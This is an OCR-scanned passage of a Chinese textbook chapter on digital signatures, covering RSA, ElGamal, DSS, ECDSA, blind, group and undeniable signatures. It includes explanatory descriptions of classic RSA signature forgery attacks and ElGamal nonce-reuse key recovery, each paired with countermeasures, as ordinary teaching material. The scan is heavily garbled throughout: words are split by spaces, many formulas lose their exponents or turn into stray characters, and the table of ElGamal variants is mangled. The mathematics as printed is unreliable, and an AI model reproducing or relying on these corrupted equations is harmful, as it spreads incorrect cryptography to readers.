图 4.11 单 密 钥 算法 数字 签名 


该 方案 的 局 限 是 接收 方 必须 持 有 用 户 密 钥 的 副本 来 检验 签名 。 由 于 双方 都 知道 生成 答 
名 的 密 钥 , 因 此 较 容易 攻破 ,存在 伪造 签名 的 可 能 。 适 用 于 熟悉 的 双方 临时 通信 。 

2. 基于 Hash 函数 和 公 钥 密 钥 的 数字 签名 

与 前 一 方案 比较 ,只 是 发 送 方 在 加 密 Hash 摘要 时 采用 的 是 自己 的 私 钥 SK ,接收 方 在 
解密 Hash 摘要 时 采用 的 是 发 送 方 的 公 钥 PK ;而 前 一 方案 都 是 采用 同一 密 钥 天 ,如 图 4. 12 所 
示 。 由 于 采用 了 公 钥 密码 体制 ,安全 性 比 前 一 方案 高 。 适 用 于 采用 公 钥 体制 通信 的 任何 
双方 。 
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发 送 方 接 


收 方 
加 Om 
© 
PK 


OnG 5 
SK 
图 4.12 Hash 与 公 钥 密 钥 数字 签名 
3. 基于 Hash 函数 对 称 密 钥 和 公 钥 密 钥 的 数字 签名 
如 图 4. 13 所 示 ,SK 、PK 是 发 送 方 的 私 钥 和 公 钥 ，E 和 Di 分 别 是 公 钥 密码 体制 的 加 
密 与 解密 算法 ,E, 和 D, 分 别 是 对 称 密码 体制 的 加 密 和 解密 算法 ,K 是 双方 公用 对 称 密 钥 。 


发 送 方 _ 接收 方 
加 


图 4.13 Hash 与 对 称 密 钥 、 公 钥 密 钥 的 数字 签名 


与 上 一 方案 比较 ,只 是 使 用 了 会 话 密 钥 K 将 传输 内 容 x 和 xzi 进行 了 加 解密 ,具有 传输 
保密 性 。 本 方案 还 可 进行 适当 变换 。 


4.3.3 RSA 数字 签名 算法 


1. RSA 算法 描述 

(1) 密 钥 生 成 算法 。 选 取 两 个 大 素数 p,q, 计算 n=pXg,p(n)= 二 (p 一 1)X(g 一 1)。 任 
选 整数 e, 满 足 0<e<p(z) , 且 gcd(e,q(n))=1。 

用 扩展 Euclidean 算法 求 e 模 p(n) 的 逆 d, 即 eXd=1 mod p(n)。 

得 到 签名 者 的 公 钥 为 {n,e}) , 私 钥 为 ( p,q,d)。 

(2) 签名 算法 。 设 消息 为 , 则 m 的 RSA 签名 是 Sig(m) 三 m* mod n。 

(3) 验证 算法 。 当 接收 方 收 到 签名 (Gm,s) 后 ,计算 m= 二 Ver(s) 三 s* mod n 是 否 成 立 , 若 
成 立 , 则 发 送 方 的 签名 有 效 。 

2， RSA 数字 签名 的 安全 性 

(1) 一 般 攻 击 方法 。 

设 n 与 e 为 用 户 A 的 公 钥 ,攻击 者 首先 随意 选择 一 个 数据 >, 并 用 A 的 公 钥 计算 

I=y modn 

于 是 可 以 伪造 A 的 一 个 RSA 数字 签名 (zt,y)。 因 为 z= 二 (y)= 二 y* 二 y mod n, 所 以 
用 户 A 对 xz 的 RSA 数字 签名 是 y。 

这 种 攻击 实际 上 成 功 的 概率 是 不 高 的 。 因 为 对 于 选择 的 数据 y, 得 到 的 + 二 y modn 具 
有 正确 语义 的 概率 是 很 低 的 。 
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(2) 选择 消息 攻击 。 
假设 攻击 者 下 想 伪 造 消息 z 的 签名 ,他 容易 找到 两 个 数据 zx, 和 zz ,使 得 : 
并 一 TIXxzzmod7 

攻击 者 下 设法 让 用 户 A 分 别 对 zi 和 zs 进行 签名 ,得 到 = 如 mod n,ys 二 zf mod n， 
然后 下 可 以 计算 y=yXys 二 zfX 如 =(CzXzz) 一 ze modm, 于 是 攻击 者 下 得 到 了 用 户 A 
对 消息 工 的 RSA 数字 签名 y。 

(3) 利用 签名 进行 攻击 ,从 而 获得 明文 。 

假设 攻击 者 EE 已 截获 了 密 文 (二 x* mod n, 他 想 求 出 明文 x。 于 是 ,他 选择 一 个 小 的 随 
机 数 ~, 并 计算 s=r* mod n,l! 二 sXe mod mt 一 王 ! mod n。 

因为 =r ,所 以 = 二 (r)*==r mod 2,r 一 4 mod n。 然 后 下 设法 让 签名 者 对 /! 签名 ,于 
是 EE 又 获得 k= 二 1 mod mn。 攻 击 者 下 再 计算 : 

(9 BE i i i Roe 

于 是 ,E 获得 了 密 文 rz。 

(4) 对 先 加 密 后 签名 方案 的 攻击 。 

假设 签名 者 A 采用 先 加 密 后 签名 的 方案 把 消息 zx 发 送 给 接收 者 B, 则 他 先 用 B 的 公开 
密 钥 es 对 x 加 密 , 然 后 用 自己 的 私 钥 ds 签名 。 

设 A 的 模 数 为 na ,B 的 模 数 为 ns ,于 是 A 发 送 给 B 的 数据 为 : 

(ze mod ng) mod na 

如 果 B 是 不 诚实 的 ,那么 B 可 能 伪造 A 的 签名 。 例 如 ,假设 B 想 抵赖 收 到 A 发 的 消息 
Z 慌 称 收 到 的 是 x, 。 因 为 ns 是 B 的 模 数 ,所 以 B 知道 ns 的 分 解 ,于 是 能 够 计算 模 mm 的 离 
散 对 数 。 即 他 能 找到 满足 : 


(71)*= x modns 
然后 ,B 再 公布 他 的 新 公开 密 钥 为 ks。 现在 B 宣布 他 收 到 的 消息 是 zi ,而 不 是 zx。 由 
于 下 式 成 立 , 因 此 A 无 法 争辩 。 
(za mod ng)s mod na = (ze mod ng)’s mod na 
前 三 种 情况 的 抵抗 措施 是 用 户 不 要 轻易 地 对 其 他 人 提供 的 随机 数据 进行 签名 ,而 应 该 
对 数据 的 Hash 值 进 行 签名 。 后 一 种 情况 的 抵抗 措施 是 签名 者 A 应 当 在 发 送 的 数据 中 加 入 
时 间 戳 ,从 而 可 证 明 是 用 公开 密 钥 es 对 x 加 密 , 而 不 是 用 新 公开 密 钥 ka 对 zi 加 密 。 仍 然 
要 对 数据 的 Hash 值 进行 签名 。 
因此 ,RSA 数字 安全 签名 的 措施 是 不 直接 对 消息 进行 签名 ,而 应 对 消息 的 Hash 值 进 
行 签名 ;要 采用 先 签名 后 加 密 的 方式 ,而 不 要 采用 先 加 密 后 签名 的 方式 。 


4.3.4 ”ElGamal 数字 签名 


1985 年 ,ElGamal T. 提出 了 一 个 基于 离散 对 数 问 题 的 数字 签名 体制 。 安 全 性 主要 是 基 
于 有 限 域 上 离散 对 数 问题 的 难 解 性 。 基 于 离散 对 数 问题 的 数字 签名 体制 包括 EIGamal 签 
名 体制 .DSA 签名 体制 和 Okamoto 签名 体制 等 。 

1. 算法 描述 

ElGamal 数字 签名 算法 的 参数 如 下 : p 为 大 素数 ;g 为 Z; 的 一 个 生成 元 ;x 为 用 户 A 
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的 秘密 密 钥 ,zER2; ,gERZ; 表示 g 是 从 2; 中 随机 选取 的 ,Z;? 二 2 一 {0) ;y 为 用 户 A 的 
公开 密 钥 ,y 三 g*(mod p)。 

签名 的 产生 过 程 如 下 。 

对 于 待 签名 的 消息 mm, 人 A 执行 以 下 步骤 : 

(1) 计算 m 的 杂 姿 值 六 (zz); 

(2) 选择 随机 数 上 ,&E Z; ,计算 r= 二 gk(mod p); 

(3) 计算 :三 (h(m) 一 zn)k ICmod p 一 1)。 

以 (r,s) 作 为 产生 的 数字 签名 。 

签名 验证 过 程 如 下 。 

接收 方 在 收 到 消息 m 和 数字 签名 (r,s) 后 , 先 计算 hm) ,并 按 下 式 验证 ， 

Ver(y, (r,s) ,hm)) = True © yrT’ = 8g" (mod p) 
正确 性 可 由 下 式 证 明 : 
yr’= gg* = gt = gt" (mod p) 

例如 , 取 p= 二 11，g = 二 2; 选 择 私 钥 x 二 8 ;计算 y==g” mod p= 二 2 mod 11=3; 公 钥 
是 y=3,g=2,p=11。 

对 hh(m) 二 5 签名 。 选 择 随 机 数 二 9, 确 定 gcd(10,9) 二 1, 计 算 r==g* mod p= 二 2* mod 
11=6。 解 s 硅 (h(m) 一 xr)k 1(mod p 一 1)= 二 9 ”!X(5 一 8X6) mod 10, 又 因为 9!=9 mod 
10, 因 此 ;==3 mod 10, 对 h(m) 二 5 的 签名 是 (二 6,s 二 3)。 

要 验证 签名 ,确认 yr 二 g*”, 左 边 36X63 二 10 mod 11 ,右边 25 王 10 mod 11, 左 边 = 右 
边 , 所 以 验证 通过 。 

2. ElGamal 数字 签名 的 安全 性 

ElGamal 数字 签名 算法 的 实现 需要 作 一 次 模 指数 运算 、 一 次 扩展 Euclidean 算法 运算 
( 求 随机 数 & 的 着 元 ) .二 次 模 乘 运算 。 前 两 个 运算 可 以 离线 进行 ,是 一 个 随机 的 数字 签名 
体制 。 

ElGamal 数字 签名 体制 的 参数 p 的 选择 与 在 Z; 中 计算 离散 对 数 的 算法 有 直接 关系 。 
从 目前 的 计算 水 平 来 看 ,p 至 少 应 该 是 二 进 制 512 位 的 素数 ;从 长 期 安全 性 考虑 ,应 使 用 
1024 位 或 更 长 的 素数 。p 一 1 最 好 有 大 的 素 因 子 ; 私 钥 zx 最 好 是 Z; 的 素数 阶 子 群 的 生 
成 元 。 

使 用 ElGamal 数字 签名 方案 的 安全 措施 : 

(1) 不 要 泄露 随机 数 &, 和 否则 根据 s 硅 (hhGm) 一 zr)k 1(mod pp 一 1) 可 计算 出 私 
钥 z 二 (hm) 一 ks)r (mod p—1)。 

(2) 不 要 使 用 同一 个 随机 数 给 两 个 不 同 的 消息 签名 。 设 (r,s) 是 消息 m 的 签名 ， 
(u,v) 是 消息 zw 的 签名 ,使 用 的 是 同一 个 随机 数 , 则 可 求 出 私 钥 z。 

3. ElGamal 数字 签名 算法 变形 

设 大 素数 p 是 模 数 ,g 是 一 个 模 p 的 本 原 元 ,zx 为 签名 者 的 私 钥 ,k 为 随机 数 ,m 为 待 签 
名 的 消息 , (r,s) 是 对 M 的 签名 。 签 名 值 的 分 量 一 8 mod p, 分 量 由 签名 算法 确定 。 
ElGamal 数字 签名 各 种 变形 的 签名 算法 和 验证 算 如 表 4. 8 所 示 。 
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表 4.8 ElGamal 数字 签名 算法 变形 


编 号 签名 算法 验证 算法 
¥ mzr=rki+s (mod p—1) ym=rrgs mod p 
2 72T 一 次 十 r (mod p—1) ym=rsgr mod p 
六 rr=mk+s (mod p—1) yr=rmgs mod p 
4 rr= 让 +m (mod p—1) yr=rsgm mod p 
5 sT=rk+m (mod p—1) ys=rrgm mod p 
6 st=mk+r (mod p—1) ys=rmgr mod p 
7 rmz=k+s (mod p—1) yrm=rgs mod p 
8 X=mrkt+s (mod p—1) y=rmrgs mod p 
9 sz=k 二 mr (mod p—1) ys=rgmr mod p 
0 一 次 十 rz (mod p—1) y=rsgrm mod p 
1 rmzr=sk+1 (mod p—1) yrm=rsg mod p 
2 sT=rmk+1 (mod p—1) ys=rrmg mod p 
3 (r+m)z=k+s (mod p—1) yrim=rgs mod p 
4 X=(m+rn)kti+s (mod p—1) y=rm+trgs mod p 
5 ST 一 人 十 (7 十 r) (mod p—1) ys=rgm+r mod p 
6 ZX 三 衣 十 (m+r) (mod p—1) y=rsgm+r mod p 
7 (mt+r)r=sk+1 (mod p—1) ymtr=rsg mod p 
8 sT=(m+r)kt+l1 (mod p—1) ys=rmt+rg mod p 


4.3.5 DSS 签名 


DSA(Digital Signature Algorithm) 是 Schnorr 和 ElGamal 签名 算法 的 变种 ,被 美国 
NIST 作为 DSSCDigital Signature Standard) 数 字 签 名 标准 。DSS 是 由 美国 国家 标准 化 研究 
院 和 国家 安全 局 共同 开发 的 ,由 美国 政府 颁布 实施 ,只 是 一 个 签名 系统 。 

1. 算法 描述 

1) DSS 签名 算法 参数 

。p: 满足 2 一 :一 pp<25 的 大 素数 ,其 中 512<L1024 且 工 是 64 的 倍数 ; 

。d: p 一 1 的 素 因子 ,满足 2”<g<2”, 即 gq 长 为 160 位 ; 

。g: 8 三 h%-?/ mod p, 其 中 是 满足 1 二 hp 一 1 且 使 得 h? ?% mod pp 之 1 的 任 一 

整数 。 

用 户 的 秘密 钥 x: 0 二 x+<g 的 随机 数 或 伪 随 机 数 ; 用 户 的 公开 钥 y: y 三 g* mod p。 

算法 使 用 一 个 单 向 散 列 函数 也 (m) ,标准 指定 为 SHA 算法 (也 可 选 MD5 等 安全 散 列 
算法 ) ,其 中 pg、g 为 系统 公开 参数 。 
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2) 签名 过 程 
对 消息 mE€227 ,产生 随机 数 &,0<k<g, 计 算 : 
r=(gt mod p) mod gq,s=(h(m)+zxnk ! modg 
签名 结果 是 Sig(m) = 二 (mm,r,s)。 
3) 验证 过 程 
计算 :一 * ! mod gq;u 二 h(m)t mod gq;v=rt mod gw 一 (gg mod p) mod g。 
若 wr, 则 认为 签名 有 效 。 
4) 算法 证 明 
由 r==(g* mod p) mod g,s 二 (h(m) 十 zr)k ! mod g, 有 
w= (gg” mod p) modg 
= (gg™ mod p) modg 
= (g 
= (gt mod p) modg 


(hm+mr) 01 


mod p) modg 
=r 
DSS 签名 过 程 如 图 4. 14 所 示 。 图 路 表 示 Hash 运算 ,M 为 消息 ,EF 为 加 密 ,D 为 解 
密 ,Kus 为 用 户 私 密 钥 ,Ku 为 用 户 公开 钥 ,Kuc 为 部 分 或 全 局 用 户 公 钥 , 为 随机 数 。 


M 


图 4.14 DSS 签名 算法 


2. DSS 安全 性 分 析 

DSA 算法 也 是 一 个 “ 非 确定 性 的 ”数字 签名 算法 ,对 于 一 个 报 文 M, 不 同 的 随机 数 可 
能 会 具有 不 同 的 签名 。 另 外 , 当 模 数 p 选用 512 位 的 素数 时 ,ElGamal 签名 的 长 度 为 1024 
位 ,而 DSA 算法 通过 160 位 的 素数 g 可 将 签名 的 长 度 降 为 320 位 ,大 大 减少 了 存储 空间 和 
传输 带宽 。 

DSS 的 安全 性 依赖 于 有 限 域 上 计算 模 数 的 离散 对 数 的 难度 ,一 般 认 为 512 位 的 DSA 算 
法 无 法 提供 长 期 的 安全 性 ,而 1024 位 的 安全 性 则 值得 依赖 。 在 使 用 相同 的 模 数 时 ,DSA 比 
RSA 更 慢 ( 两 者 产生 签名 的 速度 相同 ,但 验证 签名 时 DSA 比 RSA 慢 10~40 倍 ) 。 

DSS 的 安全 特点 : 对 报 文 的 签名 不 会 引起 密 钥 的 泄露 ; 若 不 知道 系统 的 私 钥 , 无 人 能 够 
对 给 定 的 报 文 产生 签名 ;无 人 能 够 产生 匹配 给 定 签名 的 报 文 ;无 人 能 够 修改 报 文 而 使 原 有 的 
签名 还 依然 有 效 ;无 专利 问题 ,公开 的 可 用 性 有 利于 该 技术 的 广泛 使 用 ,这 将 给 政府 和 公众 
带 来 经 济 效益 。 


4.3.6 ”椭圆 曲线 签名 


椭圆 曲线 数字 签名 算法 (Elliptic Curve Digital Signature Algorithm, ECDSA) 是 上 
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Scott Vanstone 于 1992 年 提出 的 ,使 用 椭圆 曲线 对 数字 签名 算法 (DSA) 的 模拟 ,之 后 被 多 
种 标准 组 织 采 用 。 椭 圆 曲 线 密码 体制 (ECC) 参 见 第 3 章 。 

1. 椭圆 曲线 签名 算法 参数 

设 GF(p) 为 有 限 域 ,E 是 有 限 域 GF(p) 上 的 椭圆 曲线 。 选 择 玉 上 一 点 GEE,G 的 阶 为 
满足 安全 要 求 的 素数 g。 选 择 一 个 随机 数 z,xE[1,g 一 1], 计 算 Y, 使 得 Y=xG, 那 么 公 钥 
为 了 , 私 钥 为 z。 

2. 签名 过 程 

对 给 定 消息 mw, 签 名 者 A 随机 选取 整数 k,kE[1,p 一 1], 计算 : 

kG = (ksk,), r=kmodp; hi=h(m), s= (hrr) k! mod ps 

则 对 消息 m 的 签名 值 为 (r,s)。 

如 果 =0 或 ;=0, 则 另 选 随机 数 &, 重 新 执行 上 面 的 过 程 。 

3. 验证 过 程 

签名 接收 方 收 到 消息 m 及 签名 (r,s ) ,计算 : 

hi=hm); wu=s Th modp, v=s rmodp 
然后 计算 椭圆 曲线 上 的 点 : 
(zy) = (+uw)G = G+vQ 

令 r 二 x mod p, 比 较 r=x ,如 果 相 等 则 签名 有 效 ;否则 签名 无 效 。 

4. 正确 性 验证 

因为 5==( 肌 十 rr)&! mod p;, 所 以 k= 二 ( 有 十 rz)s !，mod p。 所 以 : 

kG = (sh+s lr Xz) G= (t+u)G = uG+vQ 

则 kG 的 zx 坐标 整数 部 分 应 该 等 于 uG 十 vQ 的 x 坐标 整数 部 分 ( 设 为 v), 即 一 v。 

5. 安全 性 分 析 

ECDSA 数字 签名 在 选择 明文 下 是 不 可 伪造 的 。 一 般 采 取 此 种 攻击 的 对 手 是 在 获得 有 
选择 的 一 系列 消息 的 签名 后 (不 包括 m) 来 获得 关于 某 个 消息 m 的 有 效 签名 。 在 离散 对 数 
问题 是 困难 的 而 且 所 使 用 的 哈 希 函数 是 随机 函数 的 前 提 下 ,已 经 证 明了 对 于 选择 明文 攻击 
ECDSA 在 现 有 的 情况 下 是 不 可 伪造 的 ,在 基本 群 为 普通 群 而 且 所 使 用 的 哈 希 函数 是 在 搞 
碰撞 的 前 提 下 ,ECDSA 本 身 是 安全 的 。 


4.3.7 盲 签名 


对 于 前 面 介绍 的 数字 签名 ,签名 者 知道 所 签名 的 消息 。 但 在 数字 现金 .电子 秘密 投票 、 
反 间 谍 人 员 化 名 等 应 用 领域 , 要求 签名 者 不 能 知道 所 签名 的 消息 。 盲 签名 (Blind 
Signature) 是 指 签名 者 不 知道 所 签 文件 或 消息 的 具体 内 容 , 而 文件 或 消息 的 拥有 者 又 可 以 
得 到 签名 人 关于 真实 文件 或 消息 的 签名 的 一 种 特殊 的 签名 技术 (类 似 于 从 信封 上 签署 信件 
内 的 内 容 ) 。 

考虑 盲 签 名 在 电子 货币 中 的 应 用 ,例如 顾客 A 得 到 银行 B 对 钱 款 mm 的 盲 签 名 后 ,自己 
算出 银行 的 真正 签名 Sa(m)。 在 支付 时 提交 出 m 和 Ss(m) ,银行 能 验证 Sa(m) 是 否 为 m 的 
合法 签名 ,但 不 知道 这 是 谁 的 一 笔 消 费 。 从 而 使 A 保持 匿名 状态 , 即 消 费 行为 不 受到 监控 。 
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1. 盲 签名 过 程 

A 是 消息 m 的 拥有 者 , 称 为 求 签 名 者 ,B 称 为 签名 者 。 盲 签名 需要 两 个 基本 构件 : 

(1) 求 签名 者 A 知道 的 盲 化 函数 f 及 脱 盲 函 数 g,f 与 g 必须 满足 g (Ss(f(m)))= 
Sa (m); 

(2) 签名 者 B 的 数字 签名 方案 Sa 。 

签名 过 程 如 图 4. 15 所 示 。 


求 签名 者 A | m | 签名 者 B | ss(m) | 求 签名 者 A | Sum) | 求 签名 者 A 
进行 言 变换 进行 盲 签名 进行 脱 言 变换 得 到 签名 
六 S58 g SB(m) 
图 4.15 盲 签名 过 程 
2， RSA 盲 签名 算法 


D. Chaum 于 1985 年 提出 一 个 盲 签名 算法 ,采用 的 是 RSA 算法 , 令 B 的 公 钥 为 e, 私 钥 

为 d, 模 为 n。A 要 对 消息 m 进行 盲 签 名 , 选 1<k<m, 作 : 
1 三 mk* modn 一 B; B 对 1 签名 : 1!{ 三 (mk’)*modn 一 A 

A 计算 S 三 1/k modn, 得 S 三 mi modn。 

这 是 B 对 m 按 RSA 体制 签名 。 这 是 一 种 强 盲 签名 方案 ,具有 不 可 追踪 性 ,即使 签名 者 
保留 了 致 育 以 后 的 文件 及 其 签名 (1,S(1)), 也 不 可 能 建立 (1,S(m)) 的 关系 。 

3. 盲 签名 协议 

1) 完全 讶 签名 协议 

签名 者 完全 不 知道 所 签 文件 的 内 容 , 仅 仅 在 以 后 需要 时 签名 者 可 以 对 他 所 签署 的 文件 
进行 仲裁 。 协 议 描 述 如 下 (A 为 求 签名 者 ,B 为 签名 者 ) : 

(1) 盲 变换 。A 对 要 进行 签名 的 文件 与 一 个 随机 数 相 乘 ,该 随机 数 称 为 讶 因子 。 这 实 
际 上 完成 了 原文 件 的 隐藏 ,隐藏 完 的 文件 被 称 为 盲文 件 。 

(2) 传送 。A 将 该 盲文 件 送 给 B。 

(3) 签名 。B 对 该 盲文 件 签名 ,再 传送 给 A。 

(4) 解 盲 变换 。A 对 签 过 字 的 盲文 件 除 以 用 到 的 盲 因子 ,就 得 到 B 对 原文 件 的 签名 。 

算法 说 明 : 只 有 当 签 名 算法 和 盲 化 乘法 是 可 交换 的 ,上 述 的 协议 才 可 以 真正 实现 ;否则 
就 要 考虑 用 其 他 方法 对 原文 件 进行 盲 变换 。 为 保证 B 不 能 进行 欺诈 活动 ,要 求 盲 因 子 是 真 
正 的 随机 因子 ,这 样 B 不 能 对 任何 人 证 明 对 原文 件 的 签名 ,而 只 是 知道 对 其 签 过 名 ,并 能 验 
证 该 签名 。 这 就 是 一 个 完全 讶 签名 的 过 程 。 

完全 盲 签 名 的 特点 : 首先 B 对 文件 的 签名 是 合法 的 ,和 传统 的 签名 具有 相同 的 属性 ;B 
不 能 将 所 签 文件 与 实际 文件 联系 起 来 ,即使 他 保存 所 有 曾 签 过 的 文件 ,也 不 能 获得 所 签 文件 
的 真实 内 容 ;完全 盲 签名 可 以 使 A 令 B 签 任何 内 容 的 文件 ,这 对 了 显然 是 很 危险 的 ;为 了 避 
免 恶意 的 使 用 ,采用 “分 割 -选择 ”技术 ;B 能 知道 所 签 为 何 物 , 但 因为 协议 规定 的 限制 条 件 ， 
无 法 进行 对 他 有 利 的 欺诈 ,或 者 说 进行 欺诈 所 需 代价 超过 其 获 利 。 

2) 部 分 盲 签 名 ( 半 盲 签名 ) 

部 分 盲 签名 ( 半 讶 签名) 协议 也 叫 概率 盲 签名。 一 般 是 采用 “分 割 -选择 ”技术 ,让 签名 者 
知道 其 签署 文件 的 大 概 情况 ,但 又 不 知道 确切 的 文件 内 容 ( 如 电子 现金 .间谍 化 名 、 海 关 抽 检 
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等 )。 协 议 描述 如 下 : 

(1) 每 个 成 员 A 准备 个 文件 ,其 中 各 使 用 不 同 的 别名 ; 

(2) 成 员 用 不 同 的 盲 因 子 盲 变换 上 述 文件 ; 

(3) 将 变化 后 的 个 文件 传送 给 B; 

(4) B 随机 选择 "一 1 个 文件 ,并 向 每 一 个 成 员 索 取 其 相应 的 一 1 个 盲 因子 ; 

(5) 成 员 A 向 B 发 送 相应 的 盲 因子 ; 

(6) B 用 盲 因 子 解读 一 1 个 文件 ,确认 其 符合 要 求 ; 

(7) 若 上 述 步骤 通过 ,B 签署 剩 下 的 那 一 个 文件 ; 

(8) 成 员 A 收回 已 经 签署 的 文件 , 取 回 盲 因子 得 到 原文 件 的 签名 (签名 概率 为 1/n)。 

3) 穷 举 盲 签名 协议 

在 这 种 协议 中 ,签名 者 可 以 得 到 所 有 文件 信息 ,但 实际 上 得 不 到 任何 有 效 信息 。 适 用 于 
每 个 文件 是 一 种 结果 的 选择 ,构成 全 集 的 一 个 元 素 。 集 中 所 有 的 将 签 文件 就 得 到 一 个 全 集 ， 
签名 者 对 所 有 文件 都 做 了 数字 签名 ,而 请 求 签名 者 收 到 后 只 抽出 所 需 部 分 ,所 弃 不 需要 的 部 
分 ,从 而 达到 使 签名 者 签名 而 不 让 签名 者 了 解 有 效 信息 的 目的 。 如 秘密 投标 、 信 任 投票 的 
签名 。 

4. 盲 签名 应 用 举例 

例 一 : 要 确定 对 于 进出 关口 的 人 是 不 是 毒贩 ,海关 不 可 能 对 每 个 人 进行 检查 。 一 般 用 
概率 方法 ,例如 对 入 关 者 抽取 1/10 进行 检查 。 那 么 毒贩 在 大 多 数 情况 下 可 逃脱 ,但 有 1/10 
的 机 会 被 抓获 。 而 为 了 有 效 惩治 犯罪 ,一 旦 抓获 ,其 罚金 将 大 于 其 他 9 次 的 获 利 。 所 以 通过 
适当 地 调节 检查 概率 ,就 可 以 有 效 地 控制 贩毒 活动 。 

例 二 : 反 间 恋 组 织 的 成 员 身份 必须 保密 ,甚至 连 反 间谍 机 构 也 不 知道 他 是 谁 。 机 构 头 
目 要 给 每 个 成 员 一 个 签名 文件 ,文件 上 可 能 会 注 明 * 持 此 签署 文件 的 人 将 享有 充分 的 外 交响 
免 权 ”, 并 在 其 中 写 人 该 成 员 的 化 名 。 反 间谍 机 构 不 能 仅仅 提供 出 签名 文件 ,还 要 能 验证 提 
供 签署 文件 的 人 是 不 是 真正 的 合法 组 织 成 员 。 

每 个 特工 成 员 的 化 名 不 止 一 个 ,他 们 不 想 把 化 名 名 单 送 给 所 属 机 构 ,因为 敌 方 可 能 已 经 
破坏 了 该 机 构 的 计算 机 。 另 一 方面 , 反 间 谍 机 构 也 不 会 盲目 地 对 特工 送 来 的 文件 都 进行 
签名 。 

假定 每 个 成 员 可 有 10 个 化 名 自行 选用 ,成 员 并 不 关心 在 哪个 化 名 下 得 到 了 种 免 权 ,机 
构 的 计算 机 为 C。 每 个 成 员 准备 10 份 文件 ,各 用 不 同 的 化 名 ,以 得 到 特 免 权 ; 成 员 以 不 同 的 
盲 因子 盲 化 每 个 文件 ,然后 送 给 计算 机 C;C 随机 选 9 个 并 询问 成 员 每 个 文件 的 盲 因 子 ;成 
员 将 这 些 盲 因 子 送 给 C;C 从 9 个 文件 中 移 除 盲 因子 ,确信 其 正确 性 ;C 签署 并 将 这 10 个 文 
件 送 给 成 员 ; 成 员 移 去 言 因子 ,并 读 出 他 的 新 化 名 Bob。 这 可 能 不 是 他 用 以 欺诈 的 那个 化 
名 。 只 有 1/10 的 概率 恰好 是 可 以 用 以 欺诈 的 化 名 。 

言 签名 示例 说 明 : 通常 人 们 把 盲 变换 看 作 是 信封 , 盲 化 文件 就 是 对 文件 加 个 信封 。 而 
去 掉 盲 因子 的 过 程 就 是 打开 信封 。 文 件 在 信封 中 时 无 人 能 读 它 ,而 在 盲文 件 上 签名 相当 于 
在 复写 纸 信封 上 签名 ,从 而 得 到 了 对 真 文件 (信封 内 ) 的 签名 。 


4.3.8 和 群 签名 
群体 密码 学 是 研究 面向 一 个 团体 的 所 有 成 员 需 要 的 密码 体制 。 在 群体 密码 中 ,有 一 个 
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公用 的 公 钥 ,群体 外 面 的 人 可 以 用 它 向 群体 发 送 加 密 消息 , 密 文 收 到 后 要 由 群体 内 部 成 员 的 
子 集 共同 进行 解密 。 

群 签名 (Group Signature) 是 面向 群体 密码 学 中 的 一 个 课题 分 支 ,于 1991 年 由 Chaum 
和 Van Heyst 提出 。 群 签名 可 广泛 用 于 招 投标 、 电 子 政务 等 应 用 中 。 

群 签名 又 称 为 团体 签名 ,是 一 种 允许 组 中 的 合法 用 户 以 用 户 组 的 名 义 签名 ,同时 在 出 现 
争论 的 情况 下 ,权威 或 组 的 所 有 成 员 联 合 起 来 可 辨认 并 揭示 出 签名 者 的 一 种 特殊 的 签名 方 
案 。 和 群 签名 方案 一 般 由 组 、 组 成 员 ( 签 名 者 )、 签 名 接收 者 (验证 者 ) 和 权威 或 GC(Group 
Center) 组 成 。 

群 签 名 的 特点 : 只 有 组 中 的 合法 用 户 才能 对 消息 签名 ,并 产生 群 签名 ;签名 的 接收 者 能 
验证 群 签 名 的 有 效 性 ;签名 的 接收 者 不 能 辨认 是 谁 的 签名 ;一 旦 发 生 争 论 , 群 签名 的 权威 或 
组 中 的 所 有 成 员 的 联合 可 以 辨别 出 签名 者 。 

典型 群 签名 方案 是 基于 可 信 第 三 方 的 群 签名 方案 ( 若 团体 及 个 成 员 ), 第 三 方 产生 
nXm 对 密 钥 ( 公 私 钥 对 ) ;然后 给 每 一 个 成 员 m 对 互 异 的 密 钥 。 如 表 4. 9 所 示 。 


表 4.9 n 个 成 员 的 m 对 群 密 钥 


(PK ,SKn) (PK ,SK1:) We (PK SKw) 
(PK2 ,SK2 ) (PKz; ,SK2 ) “os (PK , SKzn ) 
(PKn ,SKn ) (PK ,SK ) ‘5 (PKm ,SKm ) 


第 三 方 把 nXm 个 公 钥 用 随机 的 顺序 加 以 公开 ,作为 群体 的 公 钥 表 ,并 且 第 三 方 记 住 每 
一 个 成 员 对 应 哪 m 对 密 钥 。 

当 群 体 中 某 一 个 成 员 签 名 时 ,从 自己 的 mm 个 私 钥 中 随机 选择 一 个 进行 签名 ;而 验证 签 
名 时 ,用 该 团体 的 公 钥 表 进 行 签 名 认证 即 可 。 

当 发 生 争议 时 ,第 三 方 知道 密 钥 对 于 成 员 之 间 的 对 应 关系 ,所 以 可 以 确定 出 签名 者 是 团 
体 中 的 哪 一 个 成 员 。 


4.3.9 其 他 数字 签名 方案 


1. 不 可 否认 数字 签名 

对 于 以 前 讨论 的 数字 签名 ,任何 人 都 可 以 对 签名 进行 验证 。 但 在 某 些 特殊 应 用 条 件 下 ， 
需要 在 签名 者 参加 的 情况 下 才能 进行 验证 。 具 有 这 种 性 质 的 数字 签名 称 为 不 可 和 否认 签名 方 
案 (Undeniable Signature Scheme) 。 

不 可 否认 签名 可 以 应 用 在 如 下 场合 : A 希望 访问 实体 了 控制 的 “安全 区 域 ”。 实 体 B 在 
授予 实体 A 访问 权 之 前 ,要 求 A 对 “访问 时 间 .日 期 ”进行 签名 。 另 一 方面 ,实体 A 不 希望 
别人 了 解 这 个 事实 , 即 没有 实体 A 的 参与 ,实体 B 不 能 通过 出 示 实 体 A 的 签名 及 验证 来 证 
明 “ 实 体 A 访问 该 区 域 "这 一 事实 。 

例如 ,公司 A 开发 的 一 个 软件 包 ,A 将 软件 包 和 它 对 软件 包 的 不 可 否认 签名 卖 给 用 户 
B。B 当场 验证 A 的 签名 ,以 便 确认 软件 包 的 真实 性 。 用 户 B 想 把 该 软件 包 的 拷贝 私自 卖 
给 第 三 者 。 由 于 没有 公司 A 参与 ,第 三 者 不 能 验证 软件 包 的 真实 性 ,从 而 保护 了 公司 A 的 
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利益 。 
Chaum 和 Van Antwerpen 在 1989 年 提出 的 不 可 否认 数字 签名 方案 : 假设 签名 者 A 想 
否认 一 个 “由 签名 生成 算法 构造 出 来 的 ?合法 签名 ,其 方式 有 拒绝 参与 验证 协议 ;错误 地 执行 
验证 协议 ;即使 验证 协议 成 功 ,也 断言 签名 是 伪造 的 。 对 于 前 者 很 明显 ,而 后 两 种 情况 难以 
防范 。 

使 用 “否认 协议 ”(Disavowal Protocol) 能 够 确定 是 签名 者 A 试图 否认 一 个 由 签名 算法 
